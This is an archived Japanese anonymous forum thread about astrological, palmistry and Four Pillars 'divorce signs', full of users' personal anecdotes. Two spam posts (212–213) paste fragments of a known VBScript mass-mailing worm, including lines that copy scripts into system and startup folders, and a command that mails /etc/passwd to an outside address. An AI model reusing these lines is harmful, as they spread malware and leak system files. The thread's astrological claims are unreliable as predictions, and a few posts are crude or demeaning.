121 :名無しさん@占い修業中:04/07/05 12:18 ID:tch7n1HE
四角い顔でダンゴ鼻、これは離婚相。

122 :名無しさん@占い修業中:04/07/05 15:00 ID:???
>120
私もわからんかった。
どういう理由があってそうなるんだろ。

123 :名無しさん@占い修業中:04/07/05 22:50 ID:???
>>115
たまたま

>>116
月っすね、重要なのは

>>117
ちゃうちゃう

>>119
微妙にちがう

>>121
うんうん

124 :名無しさん@占い修業中:04/07/07 14:33 ID:???
>>115
漏れは太陽・月コンジャクションで、
妹がスクエアなんだけど、妹が生まれる前後、親父がやはり浮気していたらしい。
その頃はなんと言うか家庭の雰囲気が冷たいものだったような気がする。
今も両親はもれを手放そうとしないが、もれが両親の「かすがい」的な役割をしているのかなぁ。

同じハードでも、オポジション(満月)はまた違いそうな木もするけど。

125 :名無しさん@占い修業中:04/07/08 12:21 ID:3RiSs/05
私の知り合いは浮気ばれてしまい離婚問題勃発していて心配なんですけど
7室に天王星や火星はないのですが、どうなんでしょうか?
8室には何もないです。

7室に 木星 おとめ座 太陽とスクエア 海王星とソフト  
      冥王星 しし座 木星とコンジャン
月は12室でと9室の太陽とソフトと9室海王星とハードと9室火星のハード



126 :名無しさん@占い修業中:04/07/08 22:05 ID:???
よそで拾ってきた。他力本願でスマソ

第7室の木星
恋愛や結婚に恵まれ、幸福な結婚と協同事業の成功を表します。
商売や職業上の人間関係は有望です。
信用できる人たちと仲間になって幸せな社会に生きるようになります。
社交的にも人気があって人と争ってもその結果として友情が芽生えたりします。
晩年に名誉と幸福と結婚による富みを獲得します。
この木星に他の星との凶相がなければ法律問題や訴訟問題は有利です。 
この木星に太陽や月との凶相があって、火星、土星と凶相があると、
幸福な家庭生活は長続きしません。 
この木星に火星、天王星との凶相があると
裁判沙汰などの問題に悩まされることもあります。

第7室の冥王星
結婚の為に最果ての土地に移ったり、
結婚によって生活の全部が変わったり多くの変貌が起こります。
配偶者の失踪などが原因で結婚生活が解消される暗示もあります。
結婚生活は新天地を求めての移動や移住が多くなり安定を失います。
移動が多い為、友人知人との交友関係も途絶えがちです。

127 :名無しさん@占い修業中:04/07/09 09:50 ID:7cBufRfu
第12室の月
多くの秘密や隠された情事、女性の敵を表します。月が蠍座や山羊座にあると狡猾で信用の出来ない女の敵が陰にいて足元をすくわれるので注意が必要。
家庭生活を表しますが孤立した静かな生活方針を持ち裏方の仕事を好みます。
この月に他の星との凶座相(180度、90度)のある場合は民事事件に関わりやすく、拘束や強制的な立ち退きのような危険があって変化が多くて不安定です。病院、収容施設、保育所、刑務所などの隔離された仕事や直感力の良さから心理学、神秘学に向いています。
男性は秘密の女性関係を持ちやすい。
http://www1.ocn.ne.jp/~getlucky/hosi4.html#label1

128 :名無しさん@占い修業中:04/07/09 19:54 ID:???
>>125
出生データキボンヌ

129 :名無しさん@占い修業中:04/08/13 22:19 ID:C6YWWXdV
辛巳の知人、めでたくりこーん。
一年もたなかったなぁ。
年端もいかないような年頃から
胃潰瘍になるくらい
精神的弱さ?悩みがちな
人生全般マゾっけがある人です。

130 :名無しさん@占い修業中:04/08/15 15:17 ID:IfO/hxzr
私の母が、我が母ながらこんなこというのもあれなんだけど
本当狐か何かついてるんじゃないかって位、我が強くて悪運強い。
ちょっとメンヘル入ってるかな?というかんじ
同居してる父や姑(ばあちゃん)の寿命が縮んでいきそうで恐ろしい。
遠方にすんでる私にばあちゃんから母さんが怖いと手紙が来るほど。
私は月と太陽が30度。月の後ろに太陽が隠れる感じだからか
幼い頃の父の記憶があまりない
母のメンヘルぶりに疲れはてた父の陰がもっとも薄かった頃だった。
妹は太陽月スクエア、母が離婚離婚と騒ぎまくっていた頃
母はこんな性格でも七室木星ソフトだからか離婚にいたらない
しかし月と瞑がタイトなオポだからか神経過敏で自分の置かれてる幸せに気づけない不憫な女だ。

131 :名無しさん@占い修業中:04/08/15 15:19 ID:???
うん

132 :130:04/08/15 15:30 ID:IfO/hxzr
あ、ちなみに母の月は涙の29度で母方の祖母(母の母)は盲目(!)
幼い頃から盲目で神経過敏な母(祖母)が悪、溺愛してくる父が(祖父)善という
極端な記憶が刷り込まれていそう。
太陽月オポ、その月が涙の29度だから恐ろしい。
母方祖母は母と性格がかぶるかも
太陽が月オポの例に漏れず母方の両親も仲が悪いが、離婚は無し。


133 :名無しさん@占い修業中:04/08/20 15:57 ID:tnpdIzRv
誰も言わないが、メンヘル系の人って、運がいい人多いよね。
運をいかしきれていないから鬱になるのか、鬱になるから運がいいのか・・

134 :名無しさん@占い修業中:04/08/20 16:11 ID:???
初めて放出しちまったときはパンツの中がネチャネチャするは
臭くなってくるはで大変だったよ(´・ω・`)
でもそれを補って余りある気持ち良さだったのも確か

最近は予めゴム着けてるから大丈夫





135 :名無しさん@占い修業中:04/08/20 22:00 ID:dbv+xnS7
>>133
鬱になれるだけの環境に恵まれているしねえ。
確かに鬱から脱出したときの彼らのパワーはすごいものがある。


136 :名無しさん@占い修業中:04/08/21 00:41 ID:kTzF9QMa
>>93
わたしは、月と土星が4室水瓶で0.4度のコンジャクション
ただ今、夫と離婚協議中・・・

知人男性は、7室水瓶月で金星とオポで
おなじく離婚協議中

137 :名無しさん@占い修業中:04/08/21 01:42 ID:???
>>136
うちの彼氏もバツイチ、月水瓶です
他に、惑星が3つも水瓶に・・・ウワーン
そういう私も水瓶に4つも惑星が・・・ASCも水瓶や

138 :名無しさん@占い修業中:04/08/21 14:06 ID:Nb+Sr0hE
>>136>>137
不倫スレで月水瓶は不倫しやすいって意見あるけど
フリーンが原因とかじゃないですよね?スマソ、参考までに伺いたいでし。

139 :名無しさん@占い修業中:04/08/21 14:30 ID:???
>>138さんのレスを読んで不倫スレ見てきますた。
私は月・火星・ASCが水瓶。月(12室)は天王星(8室)とソフト。
結婚して8年になりますが今のところ離婚はなさそう。
不倫の経験もないです(独身時代も結婚後も)。


140 :名無しさん@占い修業中:04/08/21 14:56 ID:???
>>138

137ですが、不倫ではありません。
水瓶が強い者同士、プラトニックもすごく長かったです。

不倫で多いのは、月のサインに関らず
男性で月天王星ハードが多かったです。
女性に関しては、統一性がありませんでした。不倫する人は、チャートに関係なく不倫してました。

141 :名無しさん@占い修業中:04/08/21 19:00 ID:???
でも、月水瓶座は離婚しても再婚するのが早いなーと思う。

松原千明(月水瓶)が離婚騒動の時に石田純一の母に、あまり料理しなくて
外食が多いとかいうことを暴露されてたけど、月水瓶はあまり家庭的じゃないのかな?

あと、ゲイリー・オールドマンがウマ・サーマン(月水瓶)との結婚生活を
「彼女は別の星にいた」と表現したけど月水瓶は変わったとこありそうだね。

月水瓶座に離婚が多いというのは、こういう所が原因なのかな?
違ってたらゴメンナサイ。

142 :名無しさん@占い修業中:04/08/21 20:40 ID:???
月水瓶は知的な美人が多いから男は寄ってくるのかも。

143 :136:04/08/22 00:53 ID:???
>>138
わたしの離婚の原因は、不倫とかじゃないです。
知人男性もそんな理由じゃないと思うけど、
他人の私生活の真実まではわからんのでなんともです。

ただ月水瓶って、感情面で常識が通じないって事あるかも。
わたしも「好きなものは好き、結婚していても」という気持ちはある。
行動に移すかどうかは別として。

144 :名無しさん@占い修業中:04/08/22 01:40 ID:???
>>143

> わたしも「好きなものは好き、結婚していても」という気持ちはある。
> 行動に移すかどうかは別として

しかし、『行動に移す』時、『めんどくせー』ってなるのも
水瓶座だったりするんですよねw
水瓶座らしく、モラルがどうとかで不倫を躊躇するのではなく
『めんどくせー』って理由で結局行動起こさない人も結構居るんじゃないかと思います

145 :名無しさん@占い修業中:04/08/22 01:42 ID:???
>>141

> 「彼女は別の星にいた」と表現した
ワロタ
でも、絶妙な表現ですね。

もう一つ、書くのを忘れてました
月は牡羊ですが、太陽水瓶で離婚した知人も居ます。男性です。

146 :名無しさん@占い修業中:04/08/23 17:44 ID:JbeHCHps
頭脳線が変形マスカケになってるんだけど
離婚相なんだけど仕事運は良いみたい
離婚を繰り返す女は仕事に向かえってことか

147 :名無しさん@占い修業中:04/08/23 23:08 ID:WYF+lIkv
月水瓶、太陽獅子です。
離婚しました。
15年経過しましたが再婚の気配なし。
不倫というか、BFの中には妻子ある人もいます。

148 :名無しさん@占い修業中:04/08/23 23:26 ID:???
太陽水瓶、月獅子です。
どうなんですかね・・・

149 :名無しさん@占い修業中:04/08/25 21:51 ID:???
147-148
二人がケコンすればヨシ

150 :名無しさん@占い修業中:04/08/26 13:41 ID:???
age

151 :名無しさん@占い修業中:04/08/26 13:51 ID:???
月水瓶って…彼だよ。鬱

152 :名無しさん@占い修業中:04/08/26 14:01 ID:???
まぁ。。。月水瓶ってだけじゃぁ
全員が離婚するワケでもないと思うよ

個人的に、私は水瓶が強い事よりも
天王星に太陽や月がイカれてる事のほうが怖いです。

153 :名無しさん@占い修業中:04/08/26 16:37 ID:???
私、天王星に月が・・・どうなっちゃうの?orz

154 :名無しさん@占い修業中:04/08/26 19:57 ID:rqpxvL8o
水瓶座の月は、暗にルーラーの天王星の影響を受けるから
家庭に落ち着かないタイプになるのかも。
ダイアナ元妃が月水瓶で金星天王星とTスクエア。
王室に嫁ぎながら型破りのフリーン&リコーンは水瓶と天王星のなせる業だろうか?

155 :名無しさん@占い修業中:04/08/27 17:20 ID:7hvqcaHn
うんうん
ほんと水瓶と天王星強いと結婚が大変
型破りの不倫を繰り返してしまうよ

156 :名無しさん@占い修業中:04/08/28 09:15 ID:TehXpXwA
逆に、別れそうで別れていない人っているね。
たけしなんて、ここ数年は同居してなさそうで外にも子供がいるけど別れていない。
占術的には、とっくに別れているの?

157 :名無しさん@占い修業中:04/08/29 11:45 ID:???
生年月日書いたら見てくれる人いるかな。

158 :名無しさん@占い修業中:04/08/29 11:54 ID:???
離婚する椰子はどんな星の下に生まれても離婚するもんだ。

159 :名無しさん@占い修業中:04/08/30 00:59 ID:v/iZ2Had
だいたい結婚なんていう制度なんてなくなればいいのに。
一夫一妻制なんて人間の性質上無理だよ。
なんでそんなもんに縛られなきゃならんのよ。あほくさいよ。
昔のように母系社会になって通い婚や自由恋愛ができるようになって
特定の夫妻を持たない方が少子化に歯止めがかかっていいんじゃないの。

160 :名無しさん@占い修業中:04/08/30 03:05 ID:e8j0frtE
とバカがほざいています

161 :名無しさん@占い修業中:04/08/30 03:07 ID:???
いや、時代はそういう方向に動いていると思う。
今までの制度での「戸主」である男性が貧弱になってきているし、女性の社会進出も進んでいる。。
アマゾネスのように、男は種だけもらって後はイラネってことになるかもよww

162 :名無しさん@占い修行中:04/08/30 03:40 ID:???
単純に優秀、有能な男と女が沢山の異性を手篭めにスレばいいと思う。
ダメ男とダメ女は一生童貞と処女で死んでもらって。

163 :名無しさん@占い修業中:04/08/30 04:33 ID:???
161のようになればいいんだけど
実力も財力もないくせにやたらプライドだけ高い男尊女卑の男がまだまだ多いからね
そういうのはほんとイラネ
貧弱じゃない生命力ある男があちこちに種まく分には優秀な子孫を残せて◎

164 :名無しさん@占い修業中:04/08/31 01:40 ID:???
姓名判断も星座も四柱推命もあらゆる占いしても
後家運があるとか孤独運があるとか男だったらいいとか(仕事発展)
そんなのばっかりでした。でも結婚願望強くて。
そんで、不安に思いつつも、
幸せになりたくて結婚しましたが・・・離婚は避けて通れなかった。
哀しい・・・。未だに結婚の夢は捨てきれない・・・。

165 :名無しさん@占い修行中:04/08/31 01:47 ID:???
>>164
結婚のいいカルマ持ってないと、結婚してもかならず離婚するんだってさ。

166 :名無しさん@占い修業中:04/08/31 22:54 ID:???
そりゃこまった・・・。どうすんだよ・・・。

167 :名無しさん@占い修業中:04/09/01 01:52 ID:/jX7JIlf
ていうかそもそも離婚相ておかしくない?
結婚なんて存在しない、太古の昔から人には生年月日や手相とかあるでしょ
離婚結婚なんて人が作ったもの
今でも一夫多妻が認められてる国もあるし
そういうところの人たちの手相とかはどうなってるんだ?
同棲十年とかのカップルもいるしさ
結婚、離婚が手相とか星にあらわれるのは妙…かもな
病気とか転機の時期なら解るけど。

168 :名無しさん@占い修業中:04/09/01 14:41 ID:???
ようわからんが離婚相つーのは、古代〜現代のそれぞれの結婚観に合わせて
その要素、解釈には変動がありそうだ。

共通してるのは、多分、離婚相って個人の安定した環境(家庭)を壊す
(壊される)相ってことじゃないの?

169 :名無しさん@占い修業中:04/09/06 22:26 ID:???
離婚age

170 :169:04/09/06 22:28 ID:???
│    _、 _
│  ヽ( д` ; )ノ すいません!
│ へノ   /    すいません!
└→ ω ノ
       >

171 :169:04/09/07 00:34 ID:???
うわぁ!
初めて自分の偽物が出た(汗)

172 :名無しさん@占い修業中:04/09/07 09:47 ID:???
月牛だと、束縛や嫉妬が過剰などで相手をがんじがらめにしたりで
結果離婚の流れって考えられます?

173 :名無しさん@占い修業中:04/09/07 12:44 ID:OGqGuGas
>>172
アスペクとやハウスにもよると思うが
サインだけならどっちかというとそういう病的なのは
月サソリのような気がするが。

174 :名無しさん@占い修業中:04/09/07 15:03 ID:???
>>173
私、月さそりだけど確かに嫉妬や束縛が過剰かも・・・OTL


175 :名無しさん@占い修業中:04/09/07 17:45 ID:???
四柱推命で離婚相と言ったら 官殺混雑。 

176 :名無しさん@占い修業中:04/09/07 23:23 ID:???
日干が壬辰ってだけで離婚しやすいといわれた事がある。

177 :名無しさん@占い修行中:04/09/08 10:03 ID:???
月蠍に恨まれたら怖そう(((( ;゚Д゚)))ガクガクブルブル

178 :名無しさん@占い修業中:04/09/08 22:36 ID:???
たぶん、相手が落ちるまで、精神科通いになるくらいにとことんやるよ@月蠍


179 :名無しさん@占い修業中:04/09/11 16:58:36 ID:???
>>177

ウチの親父は
太陽月火星金星全部蠍でっせ
娘は大変だYO

しかも私は殆どの星が水瓶だしねぇ
執念深い父親の前で
無茶苦茶好き勝手やりたい放題の娘ですた。

180 :名無しさん@占い修業中:04/09/13 23:50:46 ID:???
たまりにたまった文句をすべて彼にぶちまけて、鬱病ぽくしてしまったのは月蠍の私です(´・ω・`)
そういや某サイトで、金星が山羊座○度のRって出てたんですけど、
どういった意味なんでしょうか??

181 :名無しさん@占い修業中:04/09/14 07:14:08 ID:???
>>180
Rは逆行

182 :名無しさん@占い修業中:04/09/14 13:21:14 ID:???
>>181
ありがとうございます。
逆行だと意味合いも違ってくるのでしょうか・・・

183 :名無しさん@占い修業中:04/09/14 14:37:39 ID:???
>>182
天体の効用がスムーズに出ない。

184 :名無しさん@占い修業中:04/09/14 18:56:44 ID:???
>>183
度々スミマセンでしたm(_ _)m
ありがとうございました(>_<)


185 :名無しさん@占い修業中:04/10/11 19:38:14 ID:???
離婚期待age

186 :名無しさん@占い修業中:04/11/22 00:35:35 ID:???


187 :名無しさん@占い修業中:04/11/29 23:25:38 ID:g5htmcM7
月水瓶、太陽射手、グランドクロスのようにほぼすべての惑星がそれぞれ90°、180°に並んでいます。
2回離婚。

188 :名無しさん@占い修業中:04/11/29 23:35:08 ID:???
最近じゃ、離婚相より独身相が問題の人がおおそう。

189 :名無しさん@占い修業中:04/11/30 00:02:51 ID:CmecRRwO
>>187
そのような星周りで
離婚してない人を知ってます
しかしその人は身体障害者
夫とは喧嘩ばかり
離婚していてもおかしくない
しかし障害があるから易々と離婚はできないだろう

190 :名無しさん@占い修業中:04/11/30 11:53:27 ID:???
こないだ、テレビでやってた星座ランキング(太陽星座)で言ってたけど
水瓶座は基本的に結婚に向かない星座なんだって。
結婚がうまくいかない星座第2位にランクインしてました。
1位は射手座で3位が魚座、魚座は魔が差しやすい(浮気の虫)んだそうです。

太陽星座占いでしたが割りと納得しちゃいました。

191 :名無しさん@占い修業中:04/11/30 17:13:12 ID:???
>190
それはあまりあてにならないなあ。
火星魚座とかなら分かるけどね。


192 :名無しさん@占い修業中:04/11/30 22:48:43 ID:eAtewstB
天秤座が結婚の座であることを考えると、世代相で
天王星天秤座世代が離婚率増加に拍車をかけそうですね。
あと、冥王星天秤座世代は独身又は晩婚化に拍車をかけそう。


193 :名無しさん@占い修業中:04/11/30 23:54:11 ID:???
>192
第二次ベビーブームの人たちって
両方当てはまってるな

194 :名無しさん@占い修業中:04/12/03 11:32:28 ID:zhhuM+Ln
冥王天秤だけどいまんとこ当たってる。
結婚はおろかセックスもしないで死にたいつもり。
人はこの気持ち分かんないって言うけど
交わらないで全うしたい。さびしいかも知んないが。
いい死体になりそう。

195 :名無しさん@占い修業中:04/12/03 12:57:37 ID:???
ヲイヲイ適当なこと言うなよ。
たとえばこの世代のサッカー選手(小野・大久保・中村)などは結婚しているぞ。
晩婚化というより、相手を徹底的に吟味する(冥王星)という感じがするんだけど。。
が、フリーターはなぜか多いね。

冥王星蠍世代は若いうちからセクースしているヤシが多い。
性感染症(クラミジア)なども流行し始めているみたいだ。

196 :名無しさん@占い修業中:04/12/04 05:13:11 ID:???
>フリーターはなぜか多いね。
普通に就職難だからだろうに。


197 :名無しさん@占い修業中:04/12/20 13:52:37 ID:???
●○占いという詐欺行為を許してよいのか?○●
http://hobby5.2ch.net/test/read.cgi/uranai/1103504904/l50

198 :名無しさん@占い修業中:05/01/24 20:26:49 ID:ag2mSCgg
ずっとロムってきましたが、すべてはネイタルチャートで見ていくのですか?
ネイタル7室はなんも星はなく
今トランジットの7室に冥王星がどっしりで少しビビってます。

199 :名無しさん@占い修業中:05/01/30 18:55:00 ID:syPxQq0v
age

200 :名無しさん@占い修業中:05/01/30 20:37:53 ID:???
ジャッジを表す天秤冥王星時代は
自分の職業にしても配偶者にしてもとことん吟味するし
吟味されるからだろ
それは職業難や離婚率の高さに現れて当然
逆に言えばいろんな意味で結婚や職業選択に執着しているとも言える
だからとことん納得しなければ結婚はおろか働きもしないんだよ。
フリーターという永遠に選択の予知のある立場でいたいんだろう


201 :名無しさん@占い修業中:05/01/31 12:19:53 ID:???
歳を取る毎に選択肢そのものが無くなっていくことに気がついていないんだよね…。

202 :名無しさん@占い修業中:05/01/31 21:00:14 ID:???
女で太陽と月がスクエアだと離婚しますか?


203 :名無しさん@占い修業中:05/01/31 21:01:55 ID:???
また、男で月蠍・天王星と合って どうですか?

204 :名無しさん@占い修業中:05/01/31 22:02:01 ID:2sUpANY0
男好きのする女の顔。

205 :名無しさん@占い修業中:05/01/31 22:36:05 ID:???
>>200
親の世代が天秤座海王星世代なのがまた面白いね。
蟹座天王星世代(1948〜56年生まれ)が地元を嫌い核家族化している傾向もある。
この世代は会社を退職しても地元に居場所を探すのが大変なような希ガス。

逆に山羊座海王星世代(1984〜97生)は地元志向が強いあまり、あまり東京など都会などに関心が向かない傾向がある。
てスレ違いだ。。スマソ

206 :名無しさん@占い修業中:05/01/31 23:41:09 ID:IUVQJa5M
嫁さんが言っていたが、親世代が離婚だ別居だと大変なんだって。

親世代の夫は会社と結婚したようで
母子家庭みたいな家族が日本中に溢れていたもんね。

親が離婚すれば子も迷うことなく離婚するわさ。



207 :!omikuji!:05/02/01 00:12:44 ID:???
てすと

208 :名無しさん@占い修業中:05/02/19 08:49:17 ID:???
火星が蟹の男性って家庭を大事にするんでしたっけ?

209 :名無しさん@占い修業中:05/02/19 13:27:03 ID:???
(´^ิu^ิ`)


210 :(´^& ◆mZmNK0E8bM :05/02/21 21:49:22 ID:???
(´^ิu^ิ`) プギャーーッ

211 :(´^& ◆mZmNK0E8bM :05/02/21 21:51:21 ID:???
てすと

212 :名無しさん@占い修業中:05/03/09 16:55:01 ID:???
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

213 :名無しさん@占い修業中:05/03/09 16:55:38 ID:???
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"

214 :名無しさん@占い修業中:05/03/11 15:07:44 ID:Q3xM8Wt7
離婚しましたー

215 :名無しさん@占い修業中:皇紀2665/04/01(金) 16:04:44 ID:YOq32V0X
離婚相って四柱推命とかにもでてくるんですか?
ちなみに俺は先日離婚しました。

216 :名無しさん@占い修業中:2005/04/26(火) 00:42:47 ID:???
出ると思う。
四柱推命の本読んだら
元旦那は再婚すると書いてあった。
当たってた。
私も離婚というか子供運がないそうで
子供の母は継母と出て
まさにそのとうりになった。
四柱推命って本当に怖いぐらいにあたる。
長男は母親が二人と出る所など怖いぐらい。


217 :名無しさん@占い修業中:2005/05/31(火) 06:15:19 ID:???
うちの親父離婚相が出てたわけだが、養父母と揉め事おこして
戸籍上の問題がおきて、同じ人間と離婚して再婚した。
こういうのもありなのだろうか。

218 :名無しさん@占い修業中:2005/06/22(水) 00:47:09 ID:???


57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)